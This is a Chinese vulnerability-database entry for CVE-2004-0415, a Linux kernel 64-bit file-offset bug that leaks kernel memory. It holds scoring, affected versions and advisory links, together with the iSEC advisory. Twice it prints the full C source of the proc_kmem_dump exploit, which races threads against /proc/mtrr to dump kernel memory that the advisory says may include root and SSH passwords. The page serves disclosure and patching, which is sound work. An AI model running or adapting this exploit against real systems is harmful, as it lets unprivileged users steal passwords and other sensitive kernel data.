CVE-2004-0415
CVSS2.1
发布时间 :2004-11-23 00:00:00
修订时间 :2017-07-10 21:30:08
NMCOEPS    

[原文]Linux kernel does not properly convert 64-bit file offset pointers to 32 bits, which allows local users to access portions of kernel memory.


[CNNVD]Linux内核文件offset指针敏感信息泄露漏洞(CNNVD-200411-050)

        
        Linux是一款开放源代码操作系统。
        Linux内核在处理64位文件偏移指针时存在问题,本地攻击者可以利用这个漏洞获得内核内存中的敏感信息。
        Linux内核对用户空间应用程序提供文件处理API,一般来说一个文件可以被文件名识别及通过Open(2)系统调用打开返回内核文件对象的文件描述符。
        文件对象的其中一个属性成为文件偏移(file offset),每次读写都从offset记录的位置开始读写。另外通过lseek(2)系统调用也可以更改及标识介质上文件映象里的当前读/写位置。
        在最近的Linux内何中包含两个不同版本的文件处理API:旧的32位和新的64位(LFS)API。ISEC小组发现多处代码不正确地从64位大小文件偏移转换为32位文件偏移,可导致不安全的访问文件偏移成员变量。
        ISEC发现多数/proc条目(如/proc/version)泄露未初始化内核内存页,可被攻击者利用获得敏感信息。
        利用/proc/mtrr文件可读取大量内核内存信息,包括ROOT密码,OPENSSH登录密码等。详细利用方法可参看如下资料:
        http://isec.pl/vulnerabilities/isec-0016-procleaks.txt
        

- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:linux:linux_kernel:2.4.19:pre1Linux Kernel 2.4.19 pre1
cpe:/o:linux:linux_kernel:2.4.18:pre2Linux Kernel 2.4.18 pre2
cpe:/o:linux:linux_kernel:2.4.18:pre1Linux Kernel 2.4.18 pre1
cpe:/o:linux:linux_kernel:2.4.19:pre2Linux Kernel 2.4.19 pre2
cpe:/o:linux:linux_kernel:2.4.0:test2Linux Kernel 2.4.0 test2
cpe:/o:linux:linux_kernel:2.4.6Linux Kernel 2.4.6
cpe:/o:linux:linux_kernel:2.6.4Linux Kernel 2.6.4
cpe:/o:linux:linux_kernel:2.4.7Linux Kernel 2.4.7
cpe:/o:linux:linux_kernel:2.6.5Linux Kernel 2.6.5
cpe:/o:linux:linux_kernel:2.4.0:test6Linux Kernel 2.4.0 test6
cpe:/o:linux:linux_kernel:2.4.0:test5Linux Kernel 2.4.0 test5
cpe:/o:linux:linux_kernel:2.4.0:test4Linux Kernel 2.4.0 test4
cpe:/o:linux:linux_kernel:2.4.0:test3Linux Kernel 2.4.0 test3
cpe:/o:linux:linux_kernel:2.4.17Linux Kernel 2.4.17
cpe:/o:linux:linux_kernel:2.6.0:test4Linux Kernel 2.6 test4
cpe:/o:linux:linux_kernel:2.4.0:test9Linux Kernel 2.4.0 test9
cpe:/o:linux:linux_kernel:2.4.18Linux Kernel 2.4.18
cpe:/o:linux:linux_kernel:2.6.0:test3Linux Kernel 2.6 test3
cpe:/o:linux:linux_kernel:2.4.0:test8Linux Kernel 2.4.0 test8
cpe:/o:linux:linux_kernel:2.6.0:test2Linux Kernel 2.6 test2
cpe:/o:linux:linux_kernel:2.4.0:test7Linux Kernel 2.4.0 test7
cpe:/o:linux:linux_kernel:2.4.13Linux Kernel 2.4.13
cpe:/o:linux:linux_kernel:2.6.0:test8Linux Kernel 2.6 test8
cpe:/o:linux:linux_kernel:2.4.14Linux Kernel 2.4.14
cpe:/o:linux:linux_kernel:2.6.0:test7Linux Kernel 2.6 test7
cpe:/o:linux:linux_kernel:2.4.18::x86
cpe:/o:linux:linux_kernel:2.4.19Linux Kernel 2.4.19
cpe:/o:linux:linux_kernel:2.4.8Linux Kernel 2.4.8
cpe:/o:linux:linux_kernel:2.6.0:test6Linux Kernel 2.6 test6
cpe:/o:linux:linux_kernel:2.6.6Linux Kernel 2.6.6
cpe:/o:linux:linux_kernel:2.4.9Linux Kernel 2.4.9
cpe:/o:linux:linux_kernel:2.6.0:test5Linux Kernel 2.6 test5
cpe:/o:linux:linux_kernel:2.6.7Linux Kernel 2.6.7
cpe:/o:linux:linux_kernel:2.4.18:pre4Linux Kernel 2.4.18 pre4
cpe:/o:linux:linux_kernel:2.4.19:pre5Linux Kernel 2.4.19 pre5
cpe:/o:linux:linux_kernel:2.4.10Linux Kernel 2.4.10
cpe:/o:linux:linux_kernel:2.4.18:pre3Linux Kernel 2.4.18 pre3
cpe:/o:linux:linux_kernel:2.4.19:pre4Linux Kernel 2.4.19 pre4
cpe:/o:linux:linux_kernel:2.4.15Linux Kernel 2.4.15
cpe:/o:linux:linux_kernel:2.4.18:pre6Linux Kernel 2.4.18 pre6
cpe:/o:linux:linux_kernel:2.4.16Linux Kernel 2.4.16
cpe:/o:linux:linux_kernel:2.4.18:pre5Linux Kernel 2.4.18 pre5
cpe:/o:linux:linux_kernel:2.4.19:pre6Linux Kernel 2.4.19 pre6
cpe:/o:linux:linux_kernel:2.4.24_ow1
cpe:/o:linux:linux_kernel:2.4.18:pre8Linux Kernel 2.4.18 pre8
cpe:/o:linux:linux_kernel:2.4.18:pre7Linux Kernel 2.4.18 pre7
cpe:/o:linux:linux_kernel:2.4.0Linux Kernel 2.4.0
cpe:/o:linux:linux_kernel:2.4.11Linux Kernel 2.4.11
cpe:/o:linux:linux_kernel:2.4.1Linux Kernel 2.4.1
cpe:/o:linux:linux_kernel:2.4.12Linux Kernel 2.4.12
cpe:/o:linux:linux_kernel:2.4.23_ow2
cpe:/o:linux:linux_kernel:2.6.7:rc1Linux Kernel 2.6.7 Release Candidate 1
cpe:/o:linux:linux_kernel:2.6.6:rc1Linux Kernel 2.6.6 Release Candidate 1
cpe:/o:linux:linux_kernel:2.4.19:pre3Linux Kernel 2.4.19 pre3
cpe:/o:linux:linux_kernel:2.4.0:test1Linux Kernel 2.4.0 test1
cpe:/o:linux:linux_kernel:2.6_test9_cvs
cpe:/o:linux:linux_kernel:2.6.0:test1Linux Kernel 2.6 test1
cpe:/o:linux:linux_kernel:2.4.24Linux Kernel 2.4.24
cpe:/o:linux:linux_kernel:2.4.25Linux Kernel 2.4.25
cpe:/o:linux:linux_kernel:2.4.20Linux Kernel 2.4.20
cpe:/o:linux:linux_kernel:2.4.21Linux Kernel 2.4.21
cpe:/o:linux:linux_kernel:2.4.26Linux Kernel 2.4.26
cpe:/o:redhat:fedora_core:core_1.0
cpe:/o:linux:linux_kernel:2.4.22Linux Kernel 2.4.22
cpe:/o:linux:linux_kernel:2.4.23Linux Kernel 2.4.23
cpe:/o:linux:linux_kernel:2.4.21:pre4Linux Kernel 2.4.21 pre4
cpe:/o:linux:linux_kernel:2.4.21:pre7Linux Kernel 2.4.21 pre7
cpe:/o:linux:linux_kernel:2.4.23:pre9Linux Kernel 2.4.23 pre9
cpe:/o:trustix:secure_linux:2.1Trustix Secure Linux 2.1
cpe:/o:trustix:secure_linux:2.0Trustix Secure Linux 2.0
cpe:/o:linux:linux_kernel:2.4.21:pre1Linux Kernel 2.4.21 pre1
cpe:/o:linux:linux_kernel:2.4.4Linux Kernel 2.4.4
cpe:/o:linux:linux_kernel:2.6.2Linux Kernel 2.6.2
cpe:/o:linux:linux_kernel:2.4.5Linux Kernel 2.4.5
cpe:/o:linux:linux_kernel:2.6.3Linux Kernel 2.6.3
cpe:/o:linux:linux_kernel:2.4.2Linux Kernel 2.4.2
cpe:/o:linux:linux_kernel:2.6.0Linux Kernel 2.6.0
cpe:/o:linux:linux_kernel:2.4.3Linux Kernel 2.4.3
cpe:/o:linux:linux_kernel:2.6.1Linux Kernel 2.6.1
cpe:/o:linux:linux_kernel:2.4.0:test12Linux Kernel 2.4.0 test12
cpe:/o:linux:linux_kernel:2.4.0:test10Linux Kernel 2.4.0 test10
cpe:/o:linux:linux_kernel:2.4.0:test11Linux Kernel 2.4.0 test11
cpe:/o:linux:linux_kernel:2.6.0:test9Linux Kernel 2.6 test9
cpe:/o:linux:linux_kernel:2.6.1:rc1Linux Kernel 2.6.1 Release Candidate 1
cpe:/o:linux:linux_kernel:2.6.1:rc2Linux Kernel 2.6.1 Release Candidate 2
cpe:/o:linux:linux_kernel:2.6.0:test10Linux Kernel 2.6 test10
cpe:/o:linux:linux_kernel:2.6.0:test11Linux Kernel 2.6 test11

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:9965Linux kernel does not properly convert 64-bit file offset pointers to 32 bits, which allows local users to access portions of kernel memory....
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0415
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0415
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200411-050
(官方数据源) CNNVD

- 其它链接及资源

ftp://patches.sgi.com/support/free/security/advisories/20040804-01-U.asc
(UNKNOWN)  SGI  20040804-01-U
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000879
(UNKNOWN)  CONECTIVA  CLA-2004:879
http://www.gentoo.org/security/en/glsa/glsa-200408-24.xml
(UNKNOWN)  GENTOO  GLSA-200408-24
http://www.mandrakesecure.net/en/advisories/advisory.php?name=MDKSA-2004:087
(UNKNOWN)  MANDRAKE  MDKSA-2004:087
http://www.redhat.com/support/errata/RHSA-2004-413.html
(UNKNOWN)  REDHAT  RHSA-2004:413
http://www.redhat.com/support/errata/RHSA-2004-418.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2004:418
https://exchange.xforce.ibmcloud.com/vulnerabilities/16877
(UNKNOWN)  XF  linux-pointer-info-disclosure(16877)

- 漏洞信息

Linux内核文件offset指针敏感信息泄露漏洞
低危 设计错误
2004-11-23 00:00:00 2005-10-20 00:00:00
本地  
        
        Linux是一款开放源代码操作系统。
        Linux内核在处理64位文件偏移指针时存在问题,本地攻击者可以利用这个漏洞获得内核内存中的敏感信息。
        Linux内核对用户空间应用程序提供文件处理API,一般来说一个文件可以被文件名识别及通过Open(2)系统调用打开返回内核文件对象的文件描述符。
        文件对象的其中一个属性成为文件偏移(file offset),每次读写都从offset记录的位置开始读写。另外通过lseek(2)系统调用也可以更改及标识介质上文件映象里的当前读/写位置。
        在最近的Linux内何中包含两个不同版本的文件处理API:旧的32位和新的64位(LFS)API。ISEC小组发现多处代码不正确地从64位大小文件偏移转换为32位文件偏移,可导致不安全的访问文件偏移成员变量。
        ISEC发现多数/proc条目(如/proc/version)泄露未初始化内核内存页,可被攻击者利用获得敏感信息。
        利用/proc/mtrr文件可读取大量内核内存信息,包括ROOT密码,OPENSSH登录密码等。详细利用方法可参看如下资料:
        http://isec.pl/vulnerabilities/isec-0016-procleaks.txt
        

- 公告与补丁

        厂商补丁:
        Linux
        -----
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.kernel.org/

- 漏洞信息 (375)

Linux Kernel File Offset Pointer Handling Memory Disclosure Exploit (EDBID:375)
linux local
2004-08-04 Verified
0 Paul Starzetz
N/A [点击下载]
/*
 * CAN-2004-0415 / gcc -O3 proc_kmem_dump.c -o proc_kmem_dump
 *
 * Copyright (c) 2004  iSEC Security Research. All Rights Reserved.
 *
 * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
 * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
 * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
 *
 */


#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <fcntl.h>
#include <time.h>
#include <sched.h>

#include <sys/socket.h>
#include <sys/select.h>
#include <sys/time.h>
#include <sys/mman.h>

#include <linux/unistd.h>

#include <asm/page.h>


//	define machine mem size in MB
#define MEMSIZE	64



_syscall5(int, _llseek, uint, fd, ulong, hi, ulong, lo, loff_t *, res,
	  uint, wh);



void fatal(const char *msg)
{
	printf("\n");
	if(!errno) {
		fprintf(stderr, "FATAL ERROR: %s\n", msg);
	}
	else {
		perror(msg);
	}

	printf("\n");
	fflush(stdout);
	fflush(stderr);
	exit(31337);
}


static int cpid, nc, fd, pfd, r=0, i=0, csize, fsize=1024*1024*MEMSIZE,
           size=PAGE_SIZE, us;
static volatile int go[2];
static loff_t off;
static char *buf=NULL, *file, child_stack[PAGE_SIZE];
static struct timeval tv1, tv2;
static struct stat st;


//	child close sempahore & sleep
int start_child(void *arg)
{
//	unlock parent & close semaphore
	go[0]=0;
	madvise(file, csize, MADV_DONTNEED);
	madvise(file, csize, MADV_SEQUENTIAL);
	gettimeofday(&tv1, NULL);
	read(pfd, buf, 0);

	go[0]=1;
	r = madvise(file, csize, MADV_WILLNEED);
	if(r)
		fatal("madvise");

//	parent blocked on mmap_sem? GOOD!
	if(go[1] == 1 || _llseek(pfd, 0, 0, &off, SEEK_CUR)<0 ) {
		r = _llseek(pfd, 0x7fffffff, 0xffffffff, &off, SEEK_SET);
			if( r == -1 )
				fatal("lseek");
		printf("\n[+] Race won!"); fflush(stdout);
		go[0]=2;
	} else {
		printf("\n[-] Race lost %d, use another file!\n", go[1]);
		fflush(stdout);
		kill(getppid(), SIGTERM);
	}
	_exit(1);

return 0;
}


void usage(char *name)
{
	printf("\nUSAGE: %s <file not in cache>", name);
	printf("\n\n");
	exit(1);
}


int main(int ac, char **av)
{
	if(ac<2)
		usage(av[0]);

//	mmap big file not in cache
	r=stat(av[1], &st);
	if(r)
		fatal("stat file");
	csize = (st.st_size + (PAGE_SIZE-1)) & ~(PAGE_SIZE-1);

	fd=open(av[1], O_RDONLY);
	if(fd<0)
		fatal("open file");
	file=mmap(NULL, csize, PROT_READ, MAP_SHARED, fd, 0);
	if(file==MAP_FAILED)
		fatal("mmap");
	close(fd);
	printf("\n[+] mmaped uncached file at %p - %p", file, file+csize);
	fflush(stdout);

	pfd=open("/proc/mtrr", O_RDONLY);
	if(pfd<0)
		fatal("open");

	fd=open("kmem.dat", O_RDWR|O_CREAT|O_TRUNC, 0644);
	if(fd<0)
		fatal("open data");

	r=ftruncate(fd, fsize);
	if(r<0)
		fatal("ftruncate");

	buf=mmap(NULL, fsize, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
	if(buf==MAP_FAILED)
		fatal("mmap");
	close(fd);
	printf("\n[+] mmaped kernel data file at %p", buf);
	fflush(stdout);

//	clone thread wait for child sleep
	nc = nice(0);
	cpid=clone(&start_child, child_stack + sizeof(child_stack)-4,
		   CLONE_FILES|CLONE_VM, NULL);
	nice(19-nc);
	while(go[0]==0) {
		i++;
	}

//	try to read & sleep & move fpos to be negative
	gettimeofday(&tv1, NULL);
	go[1] = 1;
	r = read(pfd, buf, size );
	go[1] = 2;
	gettimeofday(&tv2, NULL);
	if(r<0)
		fatal("read");
	while(go[0]!=2) {
		i++;
	}

	us = tv2.tv_sec - tv1.tv_sec;
	us *= 1000000;
	us += (tv2.tv_usec - tv1.tv_usec) ;

	printf("\n[+] READ %d bytes in %d usec", r, us); fflush(stdout);
	r = _llseek(pfd, 0, 0, &off, SEEK_CUR);
	if(r < 0 ) {
		printf("\n[+] SUCCESS, lseek fails, reading kernel mem...\n");
		fflush(stdout);
		i=0;
		for(;;) {
			r = read(pfd, buf, PAGE_SIZE );
			if(r!=PAGE_SIZE)
				break;
			buf += PAGE_SIZE;
			i++;
			printf("\r    PAGE %6d", i); fflush(stdout);
		}
		printf("\n[+] done, err=%s", strerror(errno) );
		fflush(stdout);
	}
	close(pfd);

	printf("\n");
	sleep(1);
	kill(cpid, 9);

return 0;
}

// milw0rm.com [2004-08-04]
		

- 漏洞信息 (F34055)

proc_kmem_dump.c (PacketStormID:F34055)
2004-08-16 00:00:00
iSEC Security Research  isec.pl
exploit,kernel,local
linux
CVE-2004-0415
[点击下载]

Proc_kmem_dump is a local exploit for Linux kernels v2.4.0 through 2.4.26 which allows unprivileged users to read kernel memory.

- 漏洞信息 (F34000)

Openwall Linux Kernel Patch (PacketStormID:F34000)
2004-08-10 00:00:00
Solar Designer  openwall.com
overflow,kernel
linux
CVE-2004-0497,CVE-2004-0415
[点击下载]

The Openwall Linux kernel patch is a collection of security "hardening" features for the Linux kernel which can stop most 'cookbook' buffer overflow exploits. The patch can also add more privacy to the system by restricting access to parts of /proc so that users may not see what others are doing. Also tightens down file descriptors 0, 1, and 2, implements process limits and shared memory destruction.

- 漏洞信息 (F33965)

isec-0016-procleaks.txt (PacketStormID:F33965)
2004-08-05 00:00:00
Paul Starzetz  isec.pl
exploit,kernel,local
linux
CVE-2004-0415
[点击下载]

A critical security vulnerability has been found in the Linux kernel code handling 64bit file offset pointers. Successful exploitation allows local users to have access to kernel memory. Kernel series affected are 2.4.26 and below and 2.6.7 and below. Full exploit provided.

Synopsis:  Linux kernel file offset pointer handling
Product:   Linux kernel
Version:   2.4 up to to and including 2.4.26, 2.6 up to to and
           including 2.6.7
Vendor:    http://www.kernel.org/
URL:       http://isec.pl/vulnerabilities/isec-0016-procleaks.txt
CVE:       CAN-2004-0415
Author:    Paul Starzetz <ihaquer@isec.pl>
Date:      Aug 04, 2004



Issue:
======

A  critical  security  vulnerability  has been found in the Linux kernel
code handling 64bit file offset pointers.


Details:
========

The  Linux  kernel  offers  a  file  handling  API   to   the   userland
applications.  Basically  a  file  can  be identified by a file name and
opened through the open(2) system call which  in  turn  returns  a  file
descriptor for the kernel file object.

One  of  the  properties  of  the  file object is something called 'file
offset' (f_pos member variable of the file object), which is advanced if
one  reads  or  writtes  to the file. It can also by changed through the
lseek(2) system call and identifies the current writing/reading position
inside the file image on the media.

There  are two different versions of the file handling API inside recent
Linux kernels: the old 32 bit and the new (LFS)  64  bit  API.  We  have
identified  numerous places, where invalid conversions from 64 bit sized
file offsets to 32 bit ones as well  as  insecure  access  to  the  file
offset member variable take place.

We  have  found that most of the /proc entries (like /proc/version) leak
about one page of unitialized kernel memory  and  can  be  exploited  to
obtain sensitive data.

We  have  found  dozens  of places with suspicious or bogus code. One of
them resides in the MTRR handling code for the i386 architecture:


static ssize_t mtrr_read(struct file *file, char *buf, size_t len,
                         loff_t *ppos)
{
[1] if (*ppos >= ascii_buf_bytes) return 0;
[2] if (*ppos + len > ascii_buf_bytes) len = ascii_buf_bytes - *ppos;
    if ( copy_to_user (buf, ascii_buffer + *ppos, len) ) return -EFAULT;
[3] *ppos += len;
    return len;
}   /*  End Function mtrr_read  */


It is quite easy to see that since copy_to_user can  sleep,  the  second
reference  to  *ppos  may  use  another  value.  Or in other words, code
operating on the file->f_pos variable through a pointer must  be  atomic
in  respect  to  the current thread. We expect even more troubles in the
SMP case though.


Exploitation:
=============

In the following we want to concentrate onto the mttr.c code, however we
think  that  also  other  f_pos  handling  code  in  the  kernel  may be
exploitable.

The idea is to use the blocking property of copy_to_user to advance  the
file->f_pos  file  offset  to  be negative allowing us to bypass the two
checks marked with [1] and [2] in the above code.

There are two situation where copy_to_user() will sleep if there  is  no
page  table entry for the corresponding location in the user buffer used
to receive the data:

- the underlying buffer maps a file which is  not  in  the  kernel  page
cache yet. The file content must be read from the disk first

-  the mmap_sem semaphore of the process's VM is in a closed state, that
is another thread sharing  the  same  VM  caused  a  down_write  on  the
semaphore.

We  use the second method as follows. One of two threads sharing same VM
issues a madvise(2) call on a VMA that maps some, sufficiently big  file
setting  the  madvise  flag to WILLNEED. This will issue a down_write on
the mmap semaphore and schedule a  read-ahead  request  for  the  mmaped
file.

Second thread issues in the mean time a read on the /proc/mtrr file thus
going for sleep until the first thread returns from the  madvise  system
call.  The  two threads will be woken up in a FIFO manner thus the first
thread will run as first and can advance the file pointer  of  the  proc
file  to  the  maximum  possible  value  of 0x7fffffffffffffff while the
second thread is still waiting in the scheduler queue for CPU  (itn  the
non-SMP case).

After  the  place  marked  with [3] has been executed, the file position
will have a negative value and the checks [1] and [2] can be passed  for
any  buffer  length  supplied,  thus  leaking the kernel memory from the
address of ascii_buffer on to the user space.

We have attached a proof-of-concept exploit code  to  read  portions  of
kernel  memory.  Another  exploit  code  we have at our disposal can use
other /proc entries (like /proc/version) to  read  one  page  of  kernel
memory.


Impact:
=======

Since no special privileges are required to open the /proc/mtrr file for
reading any process may exploit the bug to read  huge  parts  of  kernel
memory.

The  kernel  memory  dump  may  include  very sensitive information like
hashed passwords from /etc/shadow or even the root passwort.

We have found in an experiment that after the root user logged in  using
ssh  (in our case it was OpenSSH using PAM), the root passwort was keept
in kernel memory. This is very suprising since sshd will  quickly  clean
(overwrite  with  zeros)  the memory portion used to store the password.
But the password may have made its way through various kernel paths like
pipes or sockets.

Tested  and known to be vulnerable kernel versions are all <= 2.4.26 and
<= 2.6.7. All users are encouraged to patch all  vulnerable  systems  as
soon  as appropriate vendor patches are released. There is no hotfix for
this vulnerability.


Credits:
========

Paul Starzetz <ihaquer@isec.pl> has  identified  the  vulnerability  and
performed  further  research. COPYING, DISTRIBUTION, AND MODIFICATION OF
INFORMATION PRESENTED HERE IS ALLOWED ONLY WITH  EXPRESS  PERMISSION  OF
ONE OF THE AUTHORS.


Disclaimer:
===========

This  document and all the information it contains are provided "as is",
for educational purposes only, without warranty  of  any  kind,  whether
express or implied.

The  authors reserve the right not to be responsible for the topicality,
correctness, completeness or quality of  the  information   provided  in
this  document.  Liability  claims regarding damage caused by the use of
any information provided, including any kind  of  information  which  is
incomplete or incorrect, will therefore be rejected.


Appendix:
=========

/*
 * gcc -O3 proc_kmem_dump.c -o proc_kmem_dump
 *
 * Copyright (c) 2004  iSEC Security Research. All Rights Reserved.
 *
 * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
 * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
 * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
 *
 */


#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <fcntl.h>
#include <time.h>
#include <sched.h>

#include <sys/socket.h>
#include <sys/select.h>
#include <sys/time.h>
#include <sys/mman.h>

#include <linux/unistd.h>

#include <asm/page.h>


//	define machine mem size in MB
#define MEMSIZE	64



_syscall5(int, _llseek, uint, fd, ulong, hi, ulong, lo, loff_t *, res,
	  uint, wh);



void fatal(const char *msg)
{
	printf("\n");
	if(!errno) {
		fprintf(stderr, "FATAL ERROR: %s\n", msg);
	}
	else {
		perror(msg);
	}

	printf("\n");
	fflush(stdout);
	fflush(stderr);
	exit(31337);
}


static int cpid, nc, fd, pfd, r=0, i=0, csize, fsize=1024*1024*MEMSIZE,
           size=PAGE_SIZE, us;
static volatile int go[2];
static loff_t off;
static char *buf=NULL, *file, child_stack[PAGE_SIZE];
static struct timeval tv1, tv2;
static struct stat st;


//	child close sempahore & sleep
int start_child(void *arg)
{
//	unlock parent & close semaphore
	go[0]=0;
	madvise(file, csize, MADV_DONTNEED);
	madvise(file, csize, MADV_SEQUENTIAL);
	gettimeofday(&tv1, NULL);
	read(pfd, buf, 0);

	go[0]=1;
	r = madvise(file, csize, MADV_WILLNEED);
	if(r)
		fatal("madvise");

//	parent blocked on mmap_sem? GOOD!
	if(go[1] == 1 || _llseek(pfd, 0, 0, &off, SEEK_CUR)<0 ) {
		r = _llseek(pfd, 0x7fffffff, 0xffffffff, &off, SEEK_SET);
			if( r == -1 )
				fatal("lseek");
		printf("\n[+] Race won!"); fflush(stdout);
		go[0]=2;
	} else {
		printf("\n[-] Race lost %d, use another file!\n", go[1]);
		fflush(stdout);
		kill(getppid(), SIGTERM);
	}
	_exit(1);

return 0;
}


void usage(char *name)
{
	printf("\nUSAGE: %s <file not in cache>", name);
	printf("\n\n");
	exit(1);
}


int main(int ac, char **av)
{
	if(ac<2)
		usage(av[0]);

//	mmap big file not in cache
	r=stat(av[1], &st);
	if(r)
		fatal("stat file");
	csize = (st.st_size + (PAGE_SIZE-1)) & ~(PAGE_SIZE-1);

	fd=open(av[1], O_RDONLY);
	if(fd<0)
		fatal("open file");
	file=mmap(NULL, csize, PROT_READ, MAP_SHARED, fd, 0);
	if(file==MAP_FAILED)
		fatal("mmap");
	close(fd);
	printf("\n[+] mmaped uncached file at %p - %p", file, file+csize);
	fflush(stdout);

	pfd=open("/proc/mtrr", O_RDONLY);
	if(pfd<0)
		fatal("open");

	fd=open("kmem.dat", O_RDWR|O_CREAT|O_TRUNC, 0644);
	if(fd<0)
		fatal("open data");

	r=ftruncate(fd, fsize);
	if(r<0)
		fatal("ftruncate");

	buf=mmap(NULL, fsize, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
	if(buf==MAP_FAILED)
		fatal("mmap");
	close(fd);
	printf("\n[+] mmaped kernel data file at %p", buf);
	fflush(stdout);

//	clone thread wait for child sleep
	nc = nice(0);
	cpid=clone(&start_child, child_stack + sizeof(child_stack)-4,
		   CLONE_FILES|CLONE_VM, NULL);
	nice(19-nc);
	while(go[0]==0) {
		i++;
	}

//	try to read & sleep & move fpos to be negative
	gettimeofday(&tv1, NULL);
	go[1] = 1;
	r = read(pfd, buf, size );
	go[1] = 2;
	gettimeofday(&tv2, NULL);
	if(r<0)
		fatal("read");
	while(go[0]!=2) {
		i++;
	}

	us = tv2.tv_sec - tv1.tv_sec;
	us *= 1000000;
	us += (tv2.tv_usec - tv1.tv_usec) ;

	printf("\n[+] READ %d bytes in %d usec", r, us); fflush(stdout);
	r = _llseek(pfd, 0, 0, &off, SEEK_CUR);
	if(r < 0 ) {
		printf("\n[+] SUCCESS, lseek fails, reading kernel mem...\n");
		fflush(stdout);
		i=0;
		for(;;) {
			r = read(pfd, buf, PAGE_SIZE );
			if(r!=PAGE_SIZE)
				break;
			buf += PAGE_SIZE;
			i++;
			printf("\r    PAGE %6d", i); fflush(stdout);
		}
		printf("\n[+] done, err=%s", strerror(errno) );
		fflush(stdout);
	}
	close(pfd);

	printf("\n");
	sleep(1);
	kill(cpid, 9);

return 0;
}

    

- 漏洞信息

8302
Linux Kernel File Offset Pointer Handling Memory
Local Access Required Information Disclosure
Loss of Confidentiality
Exploit Public

- 漏洞描述

The Linux Kernel contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when invalid conversion from 64 bit file offsets to 32 bit file offsets occur, which may disclose kernel memory information resulting in a loss of confidentiality.

- 时间线

2004-08-04 Unknow
2004-08-04 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available from kernel.org to correct this issue. Some vendors such as RedHat have released patches which are made available to their customers. Please check with your respective vendor if applicable.

- 相关参考

- 漏洞作者

- 漏洞信息

Linux Kernel File 64-Bit Offset Pointer Handling Kernel Memory Disclosure Vulnerability
Design Error 10852
No Yes
2004-08-04 12:00:00 2009-07-12 06:16:00
Discovery of this issue is credited to Paul Starzetz <ihaquer@isec.pl>.

- 受影响的程序版本

VMWare ESX Server 2.1.2
VMWare ESX Server 2.1.1
VMWare ESX Server 2.0.1 build 6403
VMWare ESX Server 2.0.1
VMWare ESX Server 2.0 build 5257
VMWare ESX Server 2.0
Trustix Secure Linux 2.1
Trustix Secure Linux 2.0
Trustix Secure Enterprise Linux 2.0
SGI ProPack 3.0
RedHat Advanced Workstation for the Itanium Processor 2.1 IA64
Red Hat Fedora Core1
Linux kernel 2.6.7 rc1
Linux kernel 2.6.7
Linux kernel 2.6.6 rc1
Linux kernel 2.6.6
Linux kernel 2.6.5
+ S.u.S.E. Linux Enterprise Server 9
+ S.u.S.E. Linux Personal 9.1 x86_64
+ S.u.S.E. Linux Personal 9.1 x86_64
+ S.u.S.E. Linux Personal 9.1
+ S.u.S.E. Linux Personal 9.1
Linux kernel 2.6.4
Linux kernel 2.6.3
Linux kernel 2.6.2
Linux kernel 2.6.1 -rc2
Linux kernel 2.6.1 -rc1
Linux kernel 2.6.1
Linux kernel 2.6 -test9-CVS
Linux kernel 2.6 -test9
Linux kernel 2.6 -test8
Linux kernel 2.6 -test7
Linux kernel 2.6 -test6
Linux kernel 2.6 -test5
Linux kernel 2.6 -test4
Linux kernel 2.6 -test3
Linux kernel 2.6 -test2
Linux kernel 2.6 -test11
Linux kernel 2.6 -test10
Linux kernel 2.6 -test1
Linux kernel 2.6
Linux kernel 2.4.26
Linux kernel 2.4.25
Linux kernel 2.4.24 -ow1
Linux kernel 2.4.24
Linux kernel 2.4.23 -pre9
Linux kernel 2.4.23 -ow2
Linux kernel 2.4.23
+ Trustix Secure Linux 2.0
Linux kernel 2.4.22
+ Devil-Linux Devil-Linux 1.0.5
+ Devil-Linux Devil-Linux 1.0.4
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
+ Red Hat Fedora Core1
+ Slackware Linux 9.1
Linux kernel 2.4.21 pre7
Linux kernel 2.4.21 pre4
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
Linux kernel 2.4.21 pre1
Linux kernel 2.4.21
+ Conectiva Linux 9.0
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ Red Hat Enterprise Linux AS 3
+ RedHat Desktop 3.0
+ RedHat Enterprise Linux ES 3
+ RedHat Enterprise Linux WS 3
+ S.u.S.E. Linux Personal 9.0 x86_64
+ S.u.S.E. Linux Personal 9.0
+ SuSE SUSE Linux Enterprise Server 8
Linux kernel 2.4.20
Linux kernel 2.4.19 -pre6
Linux kernel 2.4.19 -pre5
Linux kernel 2.4.19 -pre4
